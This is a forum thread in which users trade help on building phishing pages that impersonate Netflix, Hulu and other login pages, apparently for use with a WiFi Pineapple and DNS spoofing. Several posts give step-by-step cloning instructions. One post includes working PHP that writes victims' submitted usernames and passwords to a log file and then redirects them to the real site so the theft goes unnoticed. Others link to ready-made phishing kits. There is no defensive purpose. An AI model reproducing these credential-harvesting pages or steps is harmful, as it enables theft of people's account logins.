31 replies to this topic

[mreidiv]

Has anyone got netflix or hulu to work with phishing. i tried following the tut but the code is different in these sites. If so can you send me the files so i can see how it was done or give me a tut.

[singh763173]

tut would be nice! so that other sites could be made also

[killuminati]

Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly!

[mreidiv]

Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly!

Thank you killuminati but what i was looking for is a tutorial on defrent types of phishing web pages like netflix and hulu the use diffrent encoding in their web pages so i would like to know how to set them pages up for phishing.

[RebelCork]

Looking at the source files for Netflix,
The actual login.php page is not on the home page.
Why dont you try the following?

• Clone/Copy the standard front page of netflix and the login.php page to your MKIV
• Find the link to login.php and change it your desired location
• In the login.php from the website, and change the action method as suggested in the tutorials.
• Should work !

Try this and play around.
Extra bonus points for learning basic html and php !

[mreidiv]

Looking at the source files for Netflix,
The actual login.php page is not on the home page.
Why dont you try the following?

• Clone/Copy the standard front page of netflix and the login.php page to your MKIV
• Find the link to login.php and change it your desired location
• In the login.php from the website, and change the action method as suggested in the tutorials.
• Should work !

Try this and play around.
Extra bonus points for learning basic html and php !

thank you i have cloned the login and the first page and have tried changing by the tutorial on the web page but there is no "Action" in either page i have tried changing the href=.... to error.php to no avail, also i am working on learning html and php but once you try things many of time you get to a point where it just drives you crazy. so that is why i cam to the conclusion to ask for a little help form the community.

[RebelCork]

Change it to a button that you can control so (point to error.php).
The easiest thing to do is keep a 'snippets' tool handy and copy any 'useful' bits of code into it. That way, when you quickly want to change an element on a web page, you have a predefined bit of code that you need.

With php/html, you can't do any damage, so play around and have fun!

[reflex]

Here, some phishers that i made. Gimme a shout if you want anymore!

http://www.mediafire...1a/phishers.rar

Have fun. reflex

[CanadianTaco]

I used the tutorial found here: http://hak5.org/hack...eapple-phishing

Under "Modify a website to capture credentials" is where you want to read. Basically you're just editing the form action to your .php script thus sending the login info 'name' and 'pass' to you.

[RebelCork]

Check this out:
http://www.rohitab.c...page-generator/

If it works, post it up for everyone else

[webdirector]

Thanks reflex for the good share.

Question:

Is there a way to have it go to the real page after the user tried to login once ? I mean if he keeps on ending at the " Phishing" login he will get suspecious.

Thanks

[NotTheFed]

edited.. not changed up.


one phish page I have is like this:

www.target.com (line in dnspoof)

since this site has a follow up signon of:
https://online.target.com/signon

I can use:
header('Location: https://online.target.com/signon");

and the user is presented with the REAL logon page. (after params are written to phish.log) not perfect, but I am still working on this.

does NOT work if you are redirecting back to the same url you are spoofing.

*wish I new how to write PHP..but googling my way along*

NTF

Edited by NotTheFed, 06 April 2012 - 02:12 PM.

[NotTheFed]

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

$filed = @fopen("/usb/logs/phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);

}
if ($ref=="http://www.targetsit...argetsite.html")
header("Location: https://online.targe...te.com/signon/");
?>

<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}

</script>
</head>
<body onload="goBack()">
</body></html>

THIS works.. and can be built up... redirection for the known sites that work, back\refresh for others.

getting closer.. now if I can do the post portion.

NTF

[shadowmmm]

things we should get is like STEAM,HULU,NETFLIX,MINECRAFT(HAHA),etc.

[Vulture]

These are super easy to setup guys, just follow these steps:

1) Pull up the page you need
2) Save the page
3) Open the page in a txt editor and remove all of the scripts that aren't necessary for the landing page
3) Download all resources on the page (images, css, etc) and put them into a folder ie "netflix" with the main page saved as netflix.html
4) Edit the main page and where you see the <form> tags for logging in, just change the POST method to error.php and set the username and password "name" attribute to name and pass respectively.
5) Your done!

I will be releasing an updated phishing package in the near future containing an easy harvesting method, the one thing I am trying to figure out is how to redirect them to the real site after they have entered the credentials on the fake site.

The issue I am having here is that this will probably need to effect iptables because we do not want dnsspoof to be redirecting them for just this single domain we are dealing with.

[surbo]

If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd.
Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya.

-suRbo

[mreidiv]

If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd.
Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya.

-suRbo

Thank You suRbo


But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol

btw: SET wont generate a clone for netflix

But thanks for your input.

Edited by mreidiv, 07 April 2012 - 10:25 AM.

[NotTheFed]

here are the ones I use for netflix

http://www.filefactory.com/file/7i14ry677cud/n/Archive_zip

I use the net for all the .jpg
with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html

the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site.

NTF

*edit* you will have to change the part for the redirect for netflix. didnt get that copied over to the login.php

should be:

f ($ref=="http://netflix.com/N...flixLogin.html")
header("Location: https://signup.netflix.com/Login");
if ($ref=="http://www.netflix.c...flixLogin.html")
header("Location: https://signup.netflix.com/Login");

Edited by NotTheFed, 07 April 2012 - 01:33 PM.

[mreidiv]

here are the ones I use for netflix

http://www.filefactory.com/file/7i14ry677cud/n/Archive_zip

I use the net for all the .jpg
with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html

the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site.

NTF

Thank you, NotTheFed,

I will study it and see how you accomplished it.

[surbo]

Thank You suRbo


But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol

btw: SET wont generate a clone for netflix

But thanks for your input.

I will give it a go since you are not a skiddie =) You can reverse it for your education